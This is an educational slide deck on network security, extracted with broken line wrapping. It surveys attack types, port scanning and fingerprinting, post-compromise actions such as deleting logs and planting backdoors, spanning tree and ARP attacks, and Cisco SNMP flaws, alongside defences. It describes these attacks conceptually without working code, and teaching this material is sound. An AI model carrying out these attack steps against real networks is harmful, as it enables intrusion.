Network Security

samoanshopfitterNetworking and Communications

Nov 21, 2013 (3 years and 4 months ago)

121 views

Trish Miller

Network Security

Trish Miller


Types of Attacks


Attacks on the OSI & TCP/IP Model


Attack Methods


Prevention


Switch Vulnerabilities and Hacking


Cisco Routers


Interesting links


Objectives

Trish Miller


Physical Access
Attacks


Wiretapping


Server Hacking


Vandalism


Dialog Attacks


Eavesdropping


Impersonation


Message Alteration


Types of Attacks

Trish Miller


Social Engineering


Opening Attachments


Password Theft


Information Theft

Types of Attacks (Cont.)


Penetration Attacks


Scanning (Probing)


Break
-
in


Denial of Service


Malware


Viruses


Worms

Trish Miller

Risk Analysis of the Attack


What is the cost if the attack succeeds?


What is the probability of occurrence?


What is the severity of the threat?


What is the countermeasure cost?


What is the value to protect the system


Determine if the countermeasure should be
implemented.


Finally determine its priority.

Trish Miller

OSI & TCP/IP Related
Attacks

Trish Miller


Session


Password theft


Unauthorized Access
with Root permission


Transport & Network:


Forged TCP/IP
addresses


DoS Attacks

OSI Model Related Attacks


Application layer:


Attacks on web


Attacks are typically
virus


Presentation:


Cracking of encrypted
transmissions by short
encryption key

Trish Miller


Data Link &
Physical


Network Sniffers


Wire Taps


Trojan Horses


Malicious code

OSI Model Related Attacks

Trish Miller

Attacks Related to TCP Packet


Port Number


Applications are identified by their Port
numbers


Well
-
known ports (0
-
1023)


HTTP=80, Telnet=23, FTP=21 for supervision,
20 for data transfer, SMTP=25


Allows applications to be accessed by the
root user

Trish Miller


IP address spoofing


Change the source IP address


To conceal identity of the attacker


To have the victim think the packet comes
from a trusted host


LAND attack

Attacks Related to TCP Packet

Trish Miller

Attacks Related to TCP Packet


Port Number


Registered ports (1024
-
49152) for any
application


Not all operating systems uses these port
ranges, although all use well
-
known ports

Trish Miller

Attack Methods

Trish Miller


Host Scanning


Network Scanning


Port Scanning


Fingerprinting


Attack Methods

Trish Miller


Host Scanning


Ping range of IP addresses or use
alternative scanning messages


Identifies victims


Types of Host scanning


Ping Scanning


TCP SYN/ACK attacks

Attack Methods (Cont.)

Trish Miller


Network Scanning


Discovery of the network infrastructure
(switches, routers, subnets, etc.)


Tracert and applications similar identifies all
routers along the route to a destination host


Attack Methods (Cont.)

Trish Miller


Port Scanning


Once a host is identified, scan all ports to find
out if it is a server and what type it is


Two types:


Server Port Scanning


TCP


UDP


Client Port Scanning


NetBIOS


Ports 135


139 used for NetBIOS ports used for file
and print services.


GRC.com a free website that scan your pc for open
ports.


Attack Methods (Cont.)

Trish Miller


Fingerprinting


Discovers the host operating system and
applications as well as the version


Active (sends)


Passive (listen)


Nmap does all major scanning methods

Attack Methods (Cont.)

Trish Miller


Denial
-
of
-
Service (DoS) Attacks


Attacks on availability


SYN flooding attacks overload a host or
network with connection attempts


Stopping DoS attacks is very hard.

Attack Methods (Cont.)

Trish Miller


The Break
-
In


Password guessing


Take advantage of unpatched vulnerabilities


Session hijacking


Attack Methods (Cont.)

Trish Miller


Download rootkit via TFTP


Delete audit log files


Create backdoor account or Trojan
backdoor programs

After the Compromise

Trish Miller


Weaken security


Access to steal information, do
damage


Install malicious software (RAT, DoS
zombie, spam relay, etc.)

After the Compromise (Cont.)

Trish Miller

Prevention

Trish Miller

Preventions


Stealth Scanning


Access Control


Firewalls


Proxy Servers


IPsec


Security Policies


DMZ


Host Security


Trish Miller


Noisiness of Attacks


Exposure of the Attacker’s IP Address


Reduce the rate of Attack below the IDS
Threshold


Scan Selective Ports

Stealth Scanning

Trish Miller


The goal of access control is to prevent
attackers from gaining access, and stops them if
they do.


The best way to accomplish this is by:


Determine who needs access to the resources
located on the server.


Decide the access permissions for each resource.


Implement specific access control policies for each
resource.


Record mission critical resources.


Harden the server against attacks.


Disable invalid accounts and establish policies

Access Control

Trish Miller

Firewalls


Firewalls are designed to
protect you from outside
attempts to access your
computer, either for the
purpose of
eavesdropping on your
activities, stealing data,
sabotage, or using your
machine as a means to
launch an attack on a
third party.




Trish Miller

Firewalls (Cont.)


Hardware


Provides a strong
degree of protection
from the outside world.


Can be effective with
little or no setup


Can protect multiple
systems


Software


Better suite to protect
against Trojans and
worms.


Allows you to
configure the ports you
wish to monitor. It
gives you more fine
control.


Protects a single
system.

Trish Miller

Firewalls


Can Prevent


Discovery


Network


Traceroute


Penetration


Synflood


Garbage


UDP Ping


TCP Ping


Ping of Death

Trish Miller

Proxy


A proxy server is a buffer between your
network and the outside world.


Use an anonymous Proxy to prevent
attacks.

Trish Miller

IPSec


Provides various security services for traffic at
the IP layer


These security services include


Authentication


Integrity


Confidentiality

Trish Miller

IPsec overview
-

how IPsec helps

Problem

How IPsec
helps

Details

Unauthorized
system access

Authentication,
tamperproofing

Defense in depth by isolating
trusted from untrusted
systems

Targeted
attacks of high
-
value servers

Authentication,
tamperproofing

Locking down servers with
IPsec. Examples: HR
servers, Outlook
®

Web
Access (OWA), DC
replication

Eavesdropping

Authentication,
confidentiality

Defense in depth against
password or information
gathering by untrusted
systems

Government
guideline
compliance

Authentication,
confidentiality

Example: “All
communications between
financial servers must be
encrypted.”

Trish Miller

DMZ Image

Trish Miller


Hardening Servers


Cisco IOS


Upgrades and Patches


Unnecessary Services


Network Monitoring tools

Host Security

Trish Miller

Switch Vulnerabilities and
Hacking

Trish Miller


Used to locate IP address, version, and
model.


Mass amounts of packets being sent can
fake a crash


Used to troubleshoot network, but should
be disabled.


CDP Protocol

Trish Miller


Give users data by poisoning ARP cache
of end node.


MAC address used to determine
destination. Device driver does not check.


User can forge ARP datagram for man in
the middle attack.


ARP Poisoning

Trish Miller


SNMP manages the network.


Authentication is weak. Public and
Private community keys are clear text.


Uses UDP protocol which is prone to
spoofing.


Enable SNMPv3 without backwards
compatibility.


SNMP

Trish Miller


Standard STP takes 30
-
45 seconds to
deal with a failure or Root bridge
change.


Purpose: Spanning Tree Attack reviews
the traffic on the backbone.

Spanning Tree Attacks

Trish Miller


Only devices affected by the failure
notice the change


The attacker can create DoS condition
on the network by sending BPDUs
from the attacker.

Spanning Tree Attacks

Trish Miller


STEP 1: MAC flood the access switch


STEP 2: Advertise as a priority zero
bridge.

Spanning Tree Attacks (Cont.)

Trish Miller

Spanning Tree Attacks (Cont.)


STEP 3: The attacker becomes the
Root bridge!


Spanning Tree recalculates.


The backbone from the original network is
now the backbone from the attacking host
to the other switches on the network.

Spanning Tree Attacks (Cont.)

Trish Miller


Disabling STP can introduce
another attack.


BPDU Guard


Disables ports using portfast upon
detection of a BPDU message on
the port.


Enabled on any ports running
portfast

STP Attack Prevention

Trish Miller


Root Guard


Prevents any ports that can become the
root bridge due to their BPDU

STP Attack Prevention

Trish Miller


Cisco Content Switching Modules


Cisco Content Switching Module with
SSL

CSM and CSM
-
S

Trish Miller


Cisco Secure Desktop


3 major vulnerabilities


Maintains information after an Internet
browsing session. This occurs after an SSL
VPN session ends.


Evades the system via the system policies
preventing logoff, this will allow a VPN
connection to be activated.


Allow local users to elevate their privileges.

CDM

Trish Miller


Prevention


Cisco has software to address the
vulnerabilities.


There are workarounds available to mitigate
the effects of some of these vulnerabilities.



Trish Miller

Cisco Routers

Trish Miller


Two potential issues with Cisco
Routers


Problems with certain IOS software


SNMP


Cisco Routers

Trish Miller


Devices running Cisco IOS versions
12.0S, 12.2, 12.3 or 12.4


Problem with the software


Confidential information can be leaked out


Software updates on the CISCO site can fix
this problem


Trish Miller


Virtual Private Networks

Virtual connection 1

Virtual Connection 2

Trish Miller


Virtual Private Networks

Information leak

Error

Connection

Trish Miller


Cisco uBR10012 series devices automatically
enable SNMP read/write access


Since there are no access restrictions on this
community string , attackers can exploit this to
gain complete control of the device

Trish Miller

CISCO
Router

Attacking

Computer

By sending an SNMP set request with a spoofed source IP address
the attacker will be able to get the Victim router to send him its
configuration file.


Trish Miller

CISCO
Router

Attacking

Computer

With this information, the remote computer will be able to
have complete control over this router

Trish Miller


Fixes
-

Software updates available on
the CICSO site that will fix the
Read/Write problem

Trish Miller

Links


http://sectools.org/tools2.html


http://insecure.org/sploits/l0phtcrack.lanma
n.problems.html


http://www.grc.com/intro.htm


http://www.riskythinking.com


http://www.hidemyass.com/

Trish Miller

References


http://www.bmighty.com/network/showArticle.jhtml;jsessi
onid=2YYDWJHHX3FL2QSNDLPSKHSCJUNN2JVN?ar
ticleID=202401432&pgno=2



http://www.juniper.net/security/auto/vulnerabilities/vuln19
998.html



http://www.blackhat.com/presentations/bh
-
usa
-
02/bh
-
us
-
02
-
convery
-
switches.pdf



http://www.askapache.com/security/hacking
-
vlan
-
switched
-
networks.html



http://marc.info/?l=bugtraq&m=116300682804339&w=2




http://www.secureroot.com/security/advisories/98097021
47.html


Trish Miller

Trish Miller

Trish Miller